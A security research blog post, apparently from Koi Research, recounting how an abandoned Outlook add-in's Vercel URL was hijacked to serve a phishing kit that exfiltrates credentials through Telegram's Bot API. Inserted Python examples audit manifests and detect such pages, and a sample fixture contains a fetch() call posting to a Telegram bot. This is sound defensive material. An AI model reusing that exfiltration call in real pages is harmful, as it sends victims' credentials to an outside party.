Koi Research

AgreeToSteal: The First Malicious Outlook Add-In Leads to 4,000 Stolen Credentials

Oren Yomtov, Idan Dardikman, February 11, 2026

This is the first known malicious Microsoft Outlook add-in detected in the wild. But the developer who built it isn't the attacker.

In 2022, a developer built a meeting scheduling tool called AgreeTo and published it to the Microsoft Office Add-in Store. It worked. People liked it. Then the developer moved on, and the project died.

The add-in stayed listed in Microsoft's store. The URL it pointed to - hosted on Vercel - became claimable. An attacker claimed it, deployed a phishing kit, and Microsoft's own infrastructure started serving it inside Outlook's sidebar.

By gaining access to the attacker's exfiltration channel, we were able to recover the full scope of the operation: over 4,000 stolen Microsoft account credentials, credit card numbers, and banking security answers. The attacker was actively testing stolen credentials yesterday. The infrastructure is live as you read this.

This is the story of how a dead side project became a phishing weapon. It starts with how Office add-ins work.

[Figure: Koidex report for AgreeTo add-in]

How Office Add-Ins Work (and Why That's a Problem)

Office add-ins aren't installed code. They're URLs. A developer submits a manifest to Microsoft - an XML file that says "load this URL in an iframe inside Outlook." Microsoft reviews the manifest, signs it, and lists the add-in in their store. But the actual content - the UI, the logic, everything the user interacts with - is fetched live from the developer's server every time the add-in opens.

Here's what that looks like. This is the manifest Microsoft signed for AgreeTo in December 2022:

Note the ReadWriteItem permission. That grants the add-in the ability to read and modify the user's emails. It was appropriate for a meeting scheduler. It's less appropriate for whoever controls that URL today.

There's no static bundle to audit. No hash to verify.
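An added example, not Koi's tooling or AgreeTo's code: a small audit over an Outlook add-in manifest that pulls every remote host the add-in loads (SourceLocation, IconUrl, AppDomain), checks whether those hosts sit on hosting platforms where a deleted deployment frees the subdomain for anyone to re-register, and weighs that against the requested permission level. The sample manifest is constructed to mirror the AgreeTo listing described above, and the platform suffix list is an illustrative assumption.

```python
# Added example, not Koi's or AgreeTo's code: audit an Outlook add-in manifest
# for the takeover risk the post describes. SAMPLE_MANIFEST is constructed to
# mirror the AgreeTo listing; CLAIMABLE_SUFFIXES is an illustrative assumption.
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Platforms where a deleted deployment frees its subdomain for re-registration.
CLAIMABLE_SUFFIXES = (".vercel.app", ".netlify.app", ".github.io", ".herokuapp.com")
# Outlook add-in permission levels, least to most privileged.
PERMISSION_RANK = {"Restricted": 0, "ReadItem": 1, "ReadWriteItem": 2, "ReadWriteMailbox": 3}

SAMPLE_MANIFEST = """<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="MailApp">
  <Id>00000000-0000-0000-0000-000000000000</Id>
  <DisplayName DefaultValue="AgreeTo"/>
  <IconUrl DefaultValue="https://outlook-one.vercel.app/icon-64.png"/>
  <AppDomains><AppDomain>https://outlook-one.vercel.app</AppDomain></AppDomains>
  <FormSettings><Form xsi:type="ItemRead"><DesktopSettings>
    <SourceLocation DefaultValue="https://outlook-one.vercel.app/outlook"/>
  </DesktopSettings></Form></FormSettings>
  <Permissions>ReadWriteItem</Permissions>
</OfficeApp>"""

def _local(tag):
    return tag.rsplit("}", 1)[-1]  # strip the XML namespace prefix

def audit_manifest(xml_text, claimable=CLAIMABLE_SUFFIXES):
    """Return (hosts, permission, findings) for one add-in manifest."""
    root = ET.fromstring(xml_text)
    hosts, permission = set(), "Restricted"
    for el in root.iter():
        name = _local(el.tag)
        # Remote resources live in DefaultValue attributes (SourceLocation,
        # IconUrl, bt:Url) or in AppDomain text; collect every hostname.
        url = (el.text or "") if name == "AppDomain" else (el.get("DefaultValue") or "")
        if url.startswith("http"):
            hosts.add(urlsplit(url).hostname)
        if name == "Permissions" and el.text:
            permission = el.text.strip()
    findings = [f"{h}: hosted where a dropped deployment can be re-claimed by anyone"
                for h in sorted(hosts) if h.endswith(claimable)]
    if findings and PERMISSION_RANK.get(permission, 0) >= PERMISSION_RANK["ReadWriteItem"]:
        findings.append(f"{permission}: whoever controls that host can read and modify mail items")
    return sorted(hosts), permission, findings
```

Run it over every manifest in your tenant's deployed add-ins; a host on a claimable platform combined with ReadWriteItem or higher is the exact shape of the AgreeTo listing.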
Whatever outlook-one.vercel.app serves right now is what runs inside Outlook. If the developer pushes a bad update, it's live immediately. If someone else takes control of that URL, they control what every user of that add-in sees - inside Outlook's trusted sidebar, with full read and write access to their email.

Microsoft blessed this manifest once, in December 2022. They never check what the URL serves again.

Built, Loved, Abandoned

AgreeTo was a real product. An open-source meeting scheduling tool with a Chrome extension (1,000 users, 4.71-star rating, 21 reviews) and an Outlook add-in published to Microsoft's store in December 2022. The developer maintained an active GitHub repo - a full TypeScript monorepo with Microsoft Graph API integration, Google Calendar support, and Stripe billing. This was someone building a business.

Then development stopped. The last Chrome extension update shipped in May 2023. The developer's domain, agreeto.app, expired. By July 2024, users were leaving reviews on the Chrome extension:

"It was all 5 stars for me until this morning. I tried to log in, and the agreeto.app website is expired. Did this app die? I hope not."

"Did this app die? No longer works. Makes you login and goes to a GoDaddy holding page. I use this app all the time and does exactly what I need to do."

Google eventually removed the dead Chrome extension in February 2025. But the Outlook add-in stayed listed in Microsoft's Office Store, still pointing to a Vercel URL that no longer belonged to anyone.

[Figure: AgreeTo page on Office Add-ins marketplace]

The Takeover

At some point after the developer abandoned the project, their Vercel deployment was deleted. The subdomain outlook-one.vercel.app became claimable. An attacker grabbed it.

They deployed a four-page phishing kit: a fake Microsoft sign-in page, a password collection page, an exfiltration script, and a redirect. That's all it took. They didn't submit anything to Microsoft. They weren't required to pass any review.
They didn't create a store listing. The listing already existed - Microsoft-reviewed, Microsoft-signed, Microsoft-distributed. The attacker just claimed an orphaned URL, and Microsoft's infrastructure did the rest.

The fingerprints of two different authors are visible across the infrastructure. The original developer's assets - icons, OAuth handlers, Microsoft design files - are all 404. The attacker didn't recreate them because they didn't have the source code. They only deployed what they needed: the phishing flow.

The Attack

When a victim opens the AgreeTo add-in in Outlook, they don't see a meeting scheduler. They see a Microsoft sign-in page.

[Figure: The phishing page]

They enter their email, then their password. A single JavaScript function collects the credentials along with the victim's IP address, and sends everything to the attacker via Telegram's Bot API. No command-and-control servers. No complex infrastructure. Just a fetch() call to Telegram. Then a loading spinner for a few seconds
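An added example, not Koi's code, for the defender's side of the flow just described: a check to run over the content an add-in's SourceLocation actually serves, flagging a page that embeds a Telegram Bot API call and a password form served from a host that is not a Microsoft sign-in endpoint. SAMPLE_PAGE is a constructed stand-in with a placeholder token, not the live kit, and the Microsoft host list is an assumption to adjust for your tenant.

```python
# Added example, not Koi's code: flag a fetched add-in page that carries the
# exfiltration pattern the post describes (a credential form whose script calls
# Telegram's Bot API). SAMPLE_PAGE is a constructed stand-in, not the live kit.
import re

# Telegram Bot API URLs embed the bot's numeric id and secret token in the path.
TELEGRAM_BOT_API = re.compile(r"https?://api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{30,})/(\w+)")
PASSWORD_FIELD = re.compile(r'''<input[^>]+type=["']?password''', re.I)
# Hosts where a Microsoft sign-in form is expected (assumption); anywhere else is a red flag.
MICROSOFT_LOGIN_SUFFIXES = ("login.microsoftonline.com", "login.live.com")

SAMPLE_PAGE = """<form><input name="loginfmt"/><input type="password" name="passwd"/></form>
<script>fetch("https://api.telegram.org/bot1234567890:AAFconstructedSampleTokenXXXXXXXXXXXX/sendMessage",
              {method: "POST"});</script>"""

def scan_served_page(body, serving_host):
    """Return indicator strings for one page fetched from an add-in's SourceLocation."""
    findings = []
    for match in TELEGRAM_BOT_API.finditer(body):
        bot_id, _token, method = match.groups()
        # Record the bot id and API method; keep the secret token out of reports.
        findings.append(f"telegram-bot-api:{method}:bot{bot_id}")
    if PASSWORD_FIELD.search(body) and not serving_host.endswith(MICROSOFT_LOGIN_SUFFIXES):
        findings.append(f"password-form-served-by:{serving_host}")
    return findings
```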